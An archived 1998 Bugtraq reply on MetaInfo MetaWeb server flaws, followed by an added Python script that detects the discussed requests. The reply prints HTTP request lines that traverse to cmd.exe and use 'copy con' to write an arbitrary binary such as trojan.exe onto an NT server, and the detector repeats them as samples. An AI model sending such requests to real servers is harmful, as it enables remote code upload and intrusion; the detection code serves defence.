Bugtraq mailing list archives

Re: Security vulnerabilities in MetaInfo products
From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Tue, 30 Jun 1998 13:18:02 -0700


The MetaWeb server allows the running of NT batch/CMD files (this is how some
of the Sendmail remote configuring works); if an attacker was to upload
or produce a standard NT batch file, he could run any program he wishes.


-Jeff Forristal

Ya know, the days of old where we had to use the COPY command to edit
the autoexec.bat come to mind:

An application that uses the following command could potentially upload a
binary to an NT server and run it:

GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0

Or if you want to create a text file:

GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0

and terminate with a ^Z

Theoretically the commands above should work for the sendmail case that
Jeff explained.

--Perry

--
Perry Harrington        System Software Engineer    zelur xuniL  ()
http://www.webcom.com  perry.harrington () webcom com  Think Blue.  /\
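
A defender-side check for the request pattern discussed in this message, as an added example that is not part of the original post: it flags HTTP request lines that combine directory traversal with a command interpreter as the request target. The function names, the interpreter watch list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed watch list: command interpreters that should never be a request target.
INTERPRETERS = {"cmd.exe", "command.com"}

def decode_fully(s, max_rounds=3):
    """Undo nested percent-encoding so an encoded '..' or '.exe' is visible."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(request_line):
    """Return the set of findings for one HTTP request line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return {"malformed"}
    raw_path, _, raw_query = parts[1].partition("?")
    # Windows accepts both separators and ignores case, so normalise both.
    path = decode_fully(raw_path).replace("\\", "/").lower()
    query = decode_fully(raw_query).lower()
    findings = set()
    if ".." in path.split("/"):
        findings.add("traversal")
    if path.rsplit("/", 1)[-1] in INTERPRETERS:
        findings.add("interpreter")
        # '/c' or '/k' as the first argument means "run this command".
        if re.match(r"/[ck](\+|\s|$)", query):
            findings.add("command-switch")
    return findings

def scan(lines):
    """Return (line, findings) for every line with at least one finding."""
    hits = [(line, classify(line)) for line in lines]
    return [(line, f) for line, f in hits if f]

# Constructed sample log lines; the first is the request quoted in the message.
SAMPLE = [
    r"GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0",
    r"GET /scripts/%2e%2e\%2e%2e/WINNT/system32/CMD.EXE?/c+dir HTTP/1.0",
    "GET /docs/cmd.exe.html HTTP/1.0",
    "GET /search?q=../notes HTTP/1.0",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE):
        print(sorted(findings), line)
```

A request line carrying all three findings is the combination worth alerting on; the two benign lines show that a file merely named like an interpreter, or `..` inside a query string, is not flagged.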


